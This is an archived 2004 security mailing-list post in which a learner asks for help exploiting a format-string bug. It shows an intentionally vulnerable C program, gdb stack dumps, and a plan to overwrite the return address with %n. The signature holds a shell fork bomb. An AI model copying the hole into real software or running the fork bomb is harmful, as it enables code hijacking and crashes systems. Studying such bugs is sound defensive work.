Vulnerability Development mailing list archives
Help, problems finding addresses with format strings
From: YeYu <yeyuno () bigfoot com>
Date: Thu, 19 Feb 2004 14:23:48 +0100
Hello, Having some experience with BOF, i decided to read some docs about format strings vulnerabilities, but... my surprise is that, by any reason, i can't find anything seemed to this doc, i'd like some experience to help me. My system is a Debian/GNULinux sid with gcc 3.3.3 Look at this simple (aparently) code: --- #include <stdio.h> #include <string.h> #include <unistd.h> main () { char vuln[1024]; bzero(vuln,1024); printf("vuln program\n\n"); printf("enter some string:"); fflush(stdout); read(0,vuln,1024); printf(vuln); } --- We compile it and execute it... When program asks for string, we want to guess stack region... enter some string:%x %x %x %x bffff4d0 400 2 25207825 - This addresses are: [x0riguer]:~/Projects/fstrings$ gdb -q ./fsvuln (gdb) disas main Dump of assembler code for function main: 0x08048424 <main+0>: push %ebp 0x08048425 <main+1>: mov %esp,%ebp 0x08048427 <main+3>: sub $0x418,%esp ... ... 0x08048499 <main+117>: call 0x8048328 0x0804849e <main+122>: leave 0x0804849f <main+123>: ret End of assembler dump. (gdb) break *0x08048499 Breakpoint 2 at 0x8048499: file fsvuln.c, line 16. (gdb) r Starting program: /home/yeyu/Projects/fstrings/fsvuln vuln program enter some string:%x %x %x %x Breakpoint 2, 0x08048499 in main () at fsvuln.c:16 16 printf(vuln); (gdb) x/10wx $esp 0xbffff4c0: 0xbffff4d0 0xbffff4d0 0x00000400 0x00000002 0xbffff4d0: 0x25207825 0x78252078 0x0a782520 0x00000000 0xbffff4e0: 0x00000000 0x00000000 ... * If we can guess the string of 0xbffff4d0 ... ... (gdb) x/s 0xbffff4d0 0xbffff4d0: "%x %x %x %x\n" Now ... i think where the char vuln[1024] starts, in 0xbffff4d0 no?, i want to overwrite this buffer and theorically overwrite main ret address by other. 1- How can I guess (theorically and practically) this ret address in the stack ? (i think is in stack) 2- When i have the value of the ret address, i think i have to overwrite by techniques like %8x and %n, isn't it? Help me to solve this problem please... Thank you -- =-------------------------------------------------= ** yn0 [yeyuno () bigfoot com] ** =------[ echo "\$0&\$0">_;chmod +x _;./_ ]--------=
Current thread:
- Help, problems finding addresses with format strings YeYu (Feb 19)
- <Possible follow-ups>
- Re: Help, problems finding addresses with format strings Vade 79 (Feb 20)
- Re: Help, problems finding addresses with format strings Marco Ivaldi (Feb 20)